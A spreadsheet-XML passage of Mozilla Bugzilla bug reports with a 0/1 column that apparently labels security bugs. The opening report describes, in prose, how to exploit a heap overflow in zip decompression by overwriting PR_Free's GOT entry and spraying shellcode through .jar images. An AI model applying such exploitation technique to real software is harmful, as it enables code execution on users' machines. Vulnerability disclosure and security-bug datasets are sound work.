nsZipItem* aItem, PRFileDesc* fOut,
1269                                    char* 
bigBuf )
...
as bigBuf. Some temporary storage is made, 
and a chunk of decompression done.
...
1382       {
1383         //-- copy inflated buffer to our 
big buffer
1384         // Assertion makes sure we don't 
overflow bigBuf
1385         PR_ASSERT( outpos + ZIP_BUFLEN 
&lt;= bigBufSize);
1386         char* copyStart = bigBuf + 
outpos;
1387         memcpy(copyStart, outbuf, 
ZIP_BUFLEN);
1388       } 
...
The assertion doesn't fire. It should 
probably be made into a normal check as
well.
We now have a heap based buffer overflow.
At some point in the future, chunk_free() is 
called, and a SEGV will occur
with while referencing the values 0xdeadbeef 
and 0xfee1600d.
If these are replaced with (address of a 
function pointer)-12 and (address
of user supplied code), when the function 
pointer is called, the user
supplied code will execute.
I have successfully changed the flow of 
control in tests, by overwriting
the function pointer for PR_Free in the 
global offset table of libsnpr4.so.
"Shellcode" can be supplied in a previously 
loaded image. (A large area
can be filled using compressed image files 
stored in a .jar as the source.)
This form was submitted from
http://help.netscape.com/forms/bug-security.html?cp=bbpctr
with Mozilla/4.76 (Linux 2.2.19-7.0.16 i686; U) Opera 6.0  [en].</t>
        </is>
      </c>
      <c r="X4823" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4824">
      <c r="A4824" t="n">
        <v>720920</v>
      </c>
      <c r="B4824" t="inlineStr">
        <is>
          <t>2012-01-24 18:23:03 -0800</t>
        </is>
      </c>
      <c r="C4824" t="inlineStr">
        <is>
          <t>Add SeaMonkey 2.7b5 to bouncer</t>
        </is>
      </c>
      <c r="D4824" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4824" t="n">
        <v>1</v>
      </c>
      <c r="F4824" t="n">
        <v>1</v>
      </c>
      <c r="G4824" t="n">
        <v>5</v>
      </c>
      <c r="H4824" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4824" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4824" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4824" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4824" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4824" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4824" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4824" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4824" t="inlineStr"/>
      <c r="Q4824" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4824" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4824" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4824" t="n">
        <v>1</v>
      </c>
      <c r="U4824" t="n">
        <v>0</v>
      </c>
      <c r="V4824" t="n">
        <v>2</v>
      </c>
      <c r="W4824" t="inlineStr">
        <is>
          <t>The SeaMonkey team is going to release SeaMonkey 2.7b5 on late Thursday Jan 26'th, and we'd like to have the main builds added to bouncer for downloads.
There is a helper script at http://hg.mozilla.org/build/braindump/file/default/releases-related/add_seamonkey_to_bouncer.sh and you can edit the vars in the file to run it where VERSION=2.7b5 and OLDVER=2.7b4, or you can manually add the relevant snippets
The relevant URLs to add are (bouncer and FTP):
?product=seamonkey-2.7b5&amp;os=win
/seamonkey/releases/2.7b5/win32/:lang/SeaMonkey%20Setup%202.7b5.exe
?product=seamonkey-2.7b5&amp;os=linux
/seamonkey/releases/2.7b5/linux-i686/:lang/seamonkey-2.7b5.tar.bz2
?product=seamonkey-2.7b5&amp;os=osx
/seamonkey/releases/2.7b5/mac/:lang/SeaMonkey%202.7b5.dmg
?product=seamonkey-2.7b5-complete&amp;os=win
/seamonkey/releases/2.7b5/update/win32/:lang/seamonkey-2.7b5.complete.mar
?product=seamonkey-2.7b5-complete&amp;os=linux
/seamonkey/releases/2.7b5/update/linux-i686/:lang/seamonkey-2.7b5.complete.mar
?product=seamonkey-2.7b5-complete&amp;os=osx
/seamonkey/releases/2.7b5/update/mac/:lang/seamonkey-2.7b5.complete.mar
product=seamonkey-2.7b5-partial-2.7b4&amp;os=win
/seamonkey/releases/2.7b5/update/win32/:lang/seamonkey-2.7b4-2.7b5.partial.mar
?product=seamonkey-2.7b5-partial-2.7b4&amp;os=linux
/seamonkey/releases/2.7b5/update/linux-i686/:lang/seamonkey-2.7b4-2.7b5.partial.mar
?product=seamonkey-2.7b5-partial-2.7b4&amp;os=osx
/seamonkey/releases/2.7b5/update/mac/:lang/seamonkey-2.7b4-2.7b5.partial.mar
For now Bouncer monitors locale `tr` which will be in this release.</t>
        </is>
      </c>
      <c r="X4824" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4825">
      <c r="A4825" t="n">
        <v>944851</v>
      </c>
      <c r="B4825" t="inlineStr">
        <is>
          <t>2013-11-29 21:01:19 -0800</t>
        </is>
      </c>
      <c r="C4825" t="inlineStr">
        <is>
          <t>Array out-of-bounds [@ mozilla::dom::AudioParamTimeline::AudioNodeInputValue]</t>
        </is>
      </c>
      <c r="D4825" t="inlineStr">
        <is>
          <t>2015-02-25 20:47:29 -0800</t>
        </is>
      </c>
      <c r="E4825" t="n">
        <v>1</v>
      </c>
      <c r="F4825" t="n">
        <v>1</v>
      </c>
      <c r="G4825" t="n">
        <v>3</v>
      </c>
      <c r="H4825" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4825" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4825" t="inlineStr">
        <is>
          <t>Web Audio</t>
        </is>
      </c>
      <c r="K4825" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4825" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4825" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4825" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4825" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4825" t="inlineStr">
        <is>
          <t>[adv-main27+]</t>
        </is>
      </c>
      <c r="Q4825" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4825" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4825" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T4825" t="n">
        <v>1</v>
      </c>
      <c r="U4825" t="n">
        <v>0</v>
      </c>
      <c r="V4825" t="n">
        <v>15</v>
      </c>
      <c r="W4825" t="inlineStr">
        <is>
          <t>Created attachment 8340595
testcase
Assertion failure: i &lt; Length() (invalid array index), at nsTArray.h:887</t>
        </is>
      </c>
      <c r="X4825" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4826">
      <c r="A4826" t="n">
        <v>1478110</v>
      </c>
      <c r="B4826" t="inlineStr">
        <is>
          <t>2018-07-24 12:34:25 -0700</t>
        </is>
      </c>
      <c r="C4826" t="inlineStr">
        <is>
          <t>[tracker] stop saving crash data we aren't processing</t>
        </is>
      </c>
      <c r="D4826" t="inlineStr">
        <is>
          <t>2018-08-24 09:54:21 -0700</t>
        </is>
      </c>
      <c r="E4826" t="n">
        <v>1</v>
      </c>
      <c r="F4826" t="n">
        <v>1</v>
      </c>
      <c r="G4826" t="n">
        <v>4</v>
      </c>
      <c r="H4826" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4826" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4826" t="inlineStr">
        <is>
          <t>Antenna</t>
        </is>
      </c>
      <c r="K4826" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4826" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4826" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4826" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4826" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4826" t="inlineStr"/>
      <c r="Q4826" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4826" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4826" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4826" t="n">
        <v>1</v>
      </c>
      <c r="U4826" t="n">
        <v>0</v>
      </c>
      <c r="V4826" t="n">
        <v>7</v>
      </c>
      <c r="W4826" t="inlineStr">
        <is>
          <t>Currently, Antenna throttling rules are such that in a couple of extreme cases, Antenna will reject an incoming crash report, but in all other cases (like 99.9% of the time), Antenna will save the crash report to S3. Of the ones it saves to S3, it marks 10% of them for processing. Thus we end up with tons and tons of crash data that never gets processed and we can't do anything with.
So, why do we do this insane thing?
We do it because it's possible that a user submits a crash report, it gets saved but not processed by Socorro, and then later the user clicks on the crash id in about:crashes. That will pull up the crash report in the webapp, but since it wasn't processed, there's nothing to see. Socorro will process that crash report on-the-fly and then it's viewable. That's cool.
But what if instead of doing that, Socorro rejected the crash report and it stays on the user's machine. Then Socorro isn't storing crash reports that were never processed in S3. If the user wants to see their crash report, they would submit it from about:crashes and it would get processed at that point.
This is a big deal because it would radically drop the amount of crash data we're storing but not using.
This bug covers the work involved in getting to where Antenna rejects all crash reports it's not going to process.</t>
        </is>
      </c>
      <c r="X4826" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4827">
      <c r="A4827" t="n">
        <v>583690</v>
      </c>
      <c r="B4827" t="inlineStr">
        <is>
          <t>2010-08-02 00:59:04 -0700</t>
        </is>
      </c>
      <c r="C4827" t="inlineStr">
        <is>
          <t>[SECURITY][PostgreSQL] Bugzilla crashes when viewing a bug if a comment contains 'bug &lt;num&gt;' or 'attachment &lt;num&gt;' where &lt;num&gt; is greater than the max allowed integer</t>
        </is>
      </c>
      <c r="D4827" t="inlineStr">
        <is>
          <t>2010-08-05 21:40:03 -0700</t>
        </is>
      </c>
      <c r="E4827" t="n">
        <v>1</v>
      </c>
      <c r="F4827" t="n">
        <v>1</v>
      </c>
      <c r="G4827" t="n">
        <v>4</v>
      </c>
      <c r="H4827" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4827" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4827" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K4827" t="inlineStr">
        <is>
          <t>2.23.1</t>
        </is>
      </c>
      <c r="L4827" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4827" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4827" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4827" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4827" t="inlineStr"/>
      <c r="Q4827" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4827" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4827" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T4827" t="n">
        <v>1</v>
      </c>
      <c r="U4827" t="n">
        <v>0</v>
      </c>
      <c r="V4827" t="n">
        <v>32</v>
      </c>
      <c r="W4827" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729)
Build Identifier: 3.6.1
Crash with error 'value "4294967296" is out of range for type integer ' when I type 'bug 4294967296' in comments for bug. 
Database server is PostgreSQL 8.3.7
Bugzilla version 3.6.1
Reproducible: Always
Steps to Reproduce:
1. Open any existing bug
2. Enter 'bug 4294967296' in comment
3. Save changes
Actual Results:  
undef error - DBD::Pg::db selectrow_hashref failed: ERROR: value "4294967296" is out of range for type integer [for Statement " SELECT alias,assigned_to,bug_file_loc,bug_id,bug_severity,bug_status,cclist_accessible,component_id,delta_ts,estimated_time,everconfirmed,op_sys,priority,product_id,qa_contact,remaining_time,rep_platform,reporter_accessible,resolution,short_desc,status_whiteboard,target_milestone,version,reporter AS reporter_id,TO_CHAR(creation_ts, 'YYYY.MM.DD HH24:MI') AS creation_ts,TO_CHAR(deadline, 'YYYY-MM-DD') AS deadline FROM bugs WHERE bug_id = ?"] at Bugzilla/Object.pm line 85 Bugzilla::Object::_init('Bugzilla::Bug', 4294967296) called at Bugzilla/Object.pm line 53 Bugzilla::Object::new('Bugzilla::Bug', 4294967296) called at Bugzilla/Bug.pm line 294 Bugzilla::Bug::new('undef', 4294967296) called at Bugzilla/Template.pm line 326 Bugzilla::Template::get_bug_link('undef', 'undef', 'HASH(0x973b1f4)') called at Bugzilla/Template.pm line 245 Bugzilla::Template::quoteUrls('bug 4294967296', 'Bugzilla::Bug=HASH(0x915426c)', 'Bugzilla::Comment=HASH(0x94cdab4)') called at Bugzilla/Template.pm line 562 Bugzilla::Template::__ANON__('bug 4294967296') called at template/en/default/bug/comments.html.tmpl line 241 eval {...} called at template/en/default/bug/comments.html.tmpl line 175 Template::Provider::__ANON__('Bugzilla::Template::Context=HASH(0x8f6fcfc)') called at lib/i386-freebsd-64int/Template/Context.pm line 348 eval {...} called at lib/i386-freebsd-64int/Template/Context.pm line 321 Template::Context::process('Bugzilla::Template::Context=HASH(0x8f6fcfc)', 'a_comment') called at Bugzilla/Template/Context.pm line 45 Bugzilla::Template::Context::process('Bugzilla::Template::Context=HASH(0x8f6fcfc)', 'a_comment') called at template/en/default/bug/comments.html.tmpl line 130 eval {...} called at template/en/default/bug/comments.html.tmpl line 136 eval {...} called at template/en/default/bug/comments.html.tmpl line 18 Template::Provider::__ANON__('Bugzilla::Template::Context=HASH(0x8f6fcfc)') called at lib/i386-freebsd-64int/Template/Document.pm line 151 eval {...} called at lib/i386-freebsd-64int/Template/Document.pm line 149 Template::Document::process('Template::Document=HASH(0x972e548)', 'Bugzilla::Template::Context=HASH(0x8f6fcfc)') called at lib/i386-freebsd-64int/Template/Context.pm line 351 eval {...} called at lib/i386-freebsd-64int/Template/Context.pm line 321 Template::Context::process('Bugzilla::Template::Context=HASH(0x8f6fcfc)', 'bug/comments.html.tmpl', 'HASH(0x971a910)') called at Bugzilla/Template/Context.pm line 45 Bugzilla::Template::Context::process('Bugzilla::Template::Context=HASH(0x8f6fcfc)', 'bug/comments.html.tmpl', 'HASH(0x971a910)') called at template/en/default/bug/edit.html.tmpl line 238 eval {...} called at template/en/default/bug/edit.html.tmpl line 18 Template::Provider::__ANON__('Bugzilla::Template::Context=HASH(0x8f6fcfc)') called at lib/i386-freebsd-64int/Template/Document.pm line 151 eval {...} called at lib/i386-freebsd-64int/Template/Document.pm line 149 Template::Document::process('Template::Document=HASH(0x94b3fcc)', 'Bugzilla::Template::Context=HASH(0x8f6fcfc)') called at lib/i386-freebsd-64int/Template/Context.pm line 351 eval {...} called at lib/i386-freebsd-64int/Template/Context.pm line 321 Template::Context::process('Bugzilla::Template::Context=HASH(0x8f6fcfc)', 'bug/edit.html.tmpl') called at Bugzilla/Template/Context.pm line 45 Bugzilla::Template::Context::process('Bugzilla::Template::Context=HASH(0x8f6fcfc)', 'bug/edit.html.tmpl') called at template/en/default/bug/show.html.tmpl line 45 eval {...} called at template/en/default/bug/show.html.tmpl line 18 Template::Provider::__ANON__('Bugzilla::Template::Context=HASH(0x8f6fcfc)') called at lib/i386-freebsd-64int/Template/Document.pm line 151 eval {...} called at lib/i386-freebsd-64int/Template/Document.pm line 149 Template::Document::process('Template::Document=HASH(0x92a9544)', 'Bugzilla::Template::Context=HASH(0x8f6fcfc)') called at lib/i386-freebsd-64int/Template/Context.pm line 351 eval {...} called at lib/i386-freebsd-64int/Template/Context.pm line 321 Template::Context::process('Bugzilla::Template::Context=HASH(0x8f6fcfc)', 'Template::Document=HASH(0x92a9544)') called at Bugzilla/Template/Context.pm line 45 Bugzilla::Template::Context::process('Bugzilla::Template::Context=HASH(0x8f6fcfc)', 'Template::Document=HASH(0x92a9544)') called at lib/i386-freebsd-64int/Template/Service.pm line 94 eval {...} called at lib/i386-freebsd-64int/Template/Service.pm line 91 Template::Service::process('Template::Service=HASH(0x8ef5f7c)', 'bug/show.html.tmpl', 'HASH(0x804d16c)') called at lib/i386-freebsd-64int/Template.pm line 66 Template::process('Bugzilla::Template=HASH(0x8e6f028)', 'bug/show.html.tmpl', 'HASH(0x804d16c)') called at /usr/local/www/bugzilla/show_bug.cgi line 128</t>
        </is>
      </c>
      <c r="X4827" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4828">
      <c r="A4828" t="n">
        <v>881241</v>
      </c>
      <c r="B4828" t="inlineStr">
        <is>
          <t>2013-06-10 06:45:54 -0700</t>
        </is>
      </c>
      <c r="C4828" t="inlineStr">
        <is>
          <t>Report Abuse is not working</t>
        </is>
      </c>
      <c r="D4828" t="inlineStr">
        <is>
          <t>2013-06-11 11:02:49 -0700</t>
        </is>
      </c>
      <c r="E4828" t="n">
        <v>1</v>
      </c>
      <c r="F4828" t="n">
        <v>1</v>
      </c>
      <c r="G4828" t="n">
        <v>6</v>
      </c>
      <c r="H4828" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4828" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J4828" t="inlineStr">
        <is>
          <t>Consumer Pages</t>
        </is>
      </c>
      <c r="K4828" t="inlineStr">
        <is>
          <t>1.5</t>
        </is>
      </c>
      <c r="L4828" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4828" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4828" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4828" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4828" t="inlineStr">
        <is>
          <t>[fireplace]</t>
        </is>
      </c>
      <c r="Q4828" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4828" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4828" t="inlineStr">
        <is>
          <t>2013-06-13</t>
        </is>
      </c>
      <c r="T4828" t="n">
        <v>1</v>
      </c>
      <c r="U4828" t="n">
        <v>0</v>
      </c>
      <c r="V4828" t="n">
        <v>9</v>
      </c>
      <c r="W4828" t="inlineStr">
        <is>
          <t>Prerequisites:
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20130605 Firefox/24.0
Steps to reproduce:
1.Go to MP-dev and open any app
2.Try to send a Report Abuse
Expected results:
The abuse report is sent without any problem
Actual results:
"Error while submitting report" message is displayed
Please see attached screencast  : http://screencast.com/t/2yZC6mFA
Logs : ID: 68ff5
NOTES:
Not reproducible in production</t>
        </is>
      </c>
      <c r="X4828" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4829">
      <c r="A4829" t="n">
        <v>1071306</v>
      </c>
      <c r="B4829" t="inlineStr">
        <is>
          <t>2014-09-22 16:04:02 -0700</t>
        </is>
      </c>
      <c r="C4829" t="inlineStr">
        <is>
          <t>Tree statuses aren't updating until page is reloaded</t>
        </is>
      </c>
      <c r="D4829" t="inlineStr">
        <is>
          <t>2015-05-20 04:27:49 -0700</t>
        </is>
      </c>
      <c r="E4829" t="n">
        <v>1</v>
      </c>
      <c r="F4829" t="n">
        <v>1</v>
      </c>
      <c r="G4829" t="n">
        <v>7</v>
      </c>
      <c r="H4829" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4829" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4829" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K4829" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4829" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4829" t="inlineStr">
        <is>
          <t>Windows 8.1</t>
        </is>
      </c>
      <c r="N4829" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4829" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4829" t="inlineStr"/>
      <c r="Q4829" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4829" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4829" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4829" t="n">
        <v>1</v>
      </c>
      <c r="U4829" t="n">
        <v>0</v>
      </c>
      <c r="V4829" t="n">
        <v>9</v>
      </c>
      <c r="W4829" t="inlineStr">
        <is>
          <t>Refreshing the page correctly updated the status to show it as closed.
I know something was polled in the 10 minutes since I closed the tree, since new jobs showed up in the tab.
I think the treestatus polling should be a bit more frequent. Every 5 minutes, perhaps?</t>
        </is>
      </c>
      <c r="X4829" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4830">
      <c r="A4830" t="n">
        <v>325079</v>
      </c>
      <c r="B4830" t="inlineStr">
        <is>
          <t>2006-01-28 15:45:49 -0800</t>
        </is>
      </c>
      <c r="C4830" t="inlineStr">
        <is>
          <t>[SECURITY] The login form on the Bugzilla home page may redirect your login and password to another site</t>
        </is>
      </c>
      <c r="D4830" t="inlineStr">
        <is>
          <t>2012-07-31 10:09:23 -0700</t>
        </is>
      </c>
      <c r="E4830" t="n">
        <v>1</v>
      </c>
      <c r="F4830" t="n">
        <v>1</v>
      </c>
      <c r="G4830" t="n">
        <v>4</v>
      </c>
      <c r="H4830" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4830" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4830" t="inlineStr">
        <is>
          <t>User Accounts</t>
        </is>
      </c>
      <c r="K4830" t="inlineStr">
        <is>
          <t>2.19.3</t>
        </is>
      </c>
      <c r="L4830" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4830" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4830" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4830" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4830" t="inlineStr">
        <is>
          <t>[doesn't affect 2.16][doesn't affect 2.18][ready for 2.20.1][ready for 2.22rc1]</t>
        </is>
      </c>
      <c r="Q4830" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4830" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4830" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T4830" t="n">
        <v>1</v>
      </c>
      <c r="U4830" t="n">
        <v>0</v>
      </c>
      <c r="V4830" t="n">
        <v>19</v>
      </c>
      <c r="W4830" t="inlineStr">
        <is>
          <t>Most of the discussion is in bug 325058 already, but here is a short summary:
bug 325058 comment 0 (LpSolit):
This URL ( http://landfill.bugzilla.org//paul/ ) contains a double slash // and the login form on Bugzilla redirects me outside bugzilla.org, in my case paul.fr (but I suspect it depends on your locale, in my case: french).
Discussing with CTho on #developers, it looks like the login and password [may] have been sent to paul.fr instead of landfill.bugzilla.org, meaning that they have now my admin login and password for our QA installations.
bug 325058 comment 6 (dveditz):
Is this a landfill bug in the way it handles multiple installations? The form
action is derived from the URL. If you don't specify the double-slash and visit
the intended http://landfill.bugzilla.org/paul/ then the form action is
"/paul/index.cgi" which logs into landfill. If you use the double-slash it's
copied into the form action making 'paul' a hostname. Landfill should do some
sanity-checking when generating the form action, or specify the complete url.
Why is this filed as a networking bug? It looks like Gecko is doing exactly
what the page is telling it to do (submit the form to "paul").
bug 325058 comment 8 (LpSolit):
The problem is not specific to landfill, it affects *all* Bugzilla
installations.
The problem is that template/en/default/account/auth/login-small.html.tmpl
uses:
&lt;form name="login" action="[% cgi.script_name FILTER html %]" method="POST"&gt;
so when you enter //foo, you get action="//foo/index.cgi" which redirects you
outside your Bugzilla installation with your login and password.
It could as well be a bug in CGI.pm itself. Anyway, Bugzilla should probably
use Param('urlbase').
-----
The template/en/default/account/auth/login-small.html.tmpl template was introduced in Bugzilla 2.20 in bug 165075. This means that only the home page is affected due to the use of 'cgi.script_name' which returns the full path, but you are not affected when you have to log in due to GoAheadAndLogIn=1 which is correctly handled by Auth::Login::WWW::CGI::login(). This routine indeed calls $cgi-&gt;url(-relative=&gt;1) and so you cannot be redirected outside Param('urlbase') or Param('sslbase').
Probably the right fix is to do something similar for login-small.html.tmpl.</t>
        </is>
      </c>
      <c r="X4830" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4831">
      <c r="A4831" t="n">
        <v>1277013</v>
      </c>
      <c r="B4831" t="inlineStr">
        <is>
          <t>2016-05-31 10:21:57 -0700</t>
        </is>
      </c>
      <c r="C4831" t="inlineStr">
        <is>
          <t>The HTML5 page of the HTML developer guide has an error.</t>
        </is>
      </c>
      <c r="D4831" t="inlineStr">
        <is>
          <t>2016-06-01 12:01:26 -0700</t>
        </is>
      </c>
      <c r="E4831" t="n">
        <v>1</v>
      </c>
      <c r="F4831" t="n">
        <v>1</v>
      </c>
      <c r="G4831" t="n">
        <v>6</v>
      </c>
      <c r="H4831" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4831" t="inlineStr">
        <is>
          <t>Developer Documentation Graveyard</t>
        </is>
      </c>
      <c r="J4831" t="inlineStr">
        <is>
          <t>HTML</t>
        </is>
      </c>
      <c r="K4831" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4831" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4831" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N4831" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4831" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4831" t="inlineStr"/>
      <c r="Q4831" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4831" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4831" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4831" t="n">
        <v>0</v>
      </c>
      <c r="U4831" t="n">
        <v>0</v>
      </c>
      <c r="V4831" t="n">
        <v>2</v>
      </c>
      <c r="W4831" t="inlineStr">
        <is>
          <t>:: Developer Documentation Request
      Request Type: Correction
     Gecko Version: unspecified
 Technical Contact: 
:: Details
The article says "Html5yMcHtml5Face is the latest evolution of the standard that defines HTML." It should say "Html5 is the latest evolution of the standard that defines HTML." This needs to be addressed immediately as this error occurs in the first sentence of the developer guide.</t>
        </is>
      </c>
      <c r="X4831" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4832">
      <c r="A4832" t="n">
        <v>1184068</v>
      </c>
      <c r="B4832" t="inlineStr">
        <is>
          <t>2015-07-15 04:42:23 -0700</t>
        </is>
      </c>
      <c r="C4832" t="inlineStr">
        <is>
          <t>Crash in mozilla::dom::CrashReporterParent::GenerateChildData due to plugin crash in NP_Shutdown</t>
        </is>
      </c>
      <c r="D4832" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E4832" t="n">
        <v>1</v>
      </c>
      <c r="F4832" t="n">
        <v>1</v>
      </c>
      <c r="G4832" t="n">
        <v>6</v>
      </c>
      <c r="H4832" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4832" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J4832" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K4832" t="inlineStr">
        <is>
          <t>39 Branch</t>
        </is>
      </c>
      <c r="L4832" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4832" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4832" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4832" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4832" t="inlineStr">
        <is>
          <t>[adv-main40+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q4832" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4832" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4832" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T4832" t="n">
        <v>1</v>
      </c>
      <c r="U4832" t="n">
        <v>0</v>
      </c>
      <c r="V4832" t="n">
        <v>15</v>
      </c>
      <c r="W4832" t="inlineStr">
        <is>
          <t>Reporting this separately to bug 1183095 because I'm not sure whether this is security sensitive.
Whilst investigating bug 1183095, I think I've discovered that there are 2 separate issues:
1) The plugin process crashes during the call to NP_Shutdown (whilst the browser is in mozilla::plugins::PPluginModuleParent::CallNP_Shutdown). This appears to only be happening in Ubuntu builds.
2) The plugin process crashing inside NP_Shutdown tickles another bug which crashes the browser process, and this is not unique to Ubuntu builds.
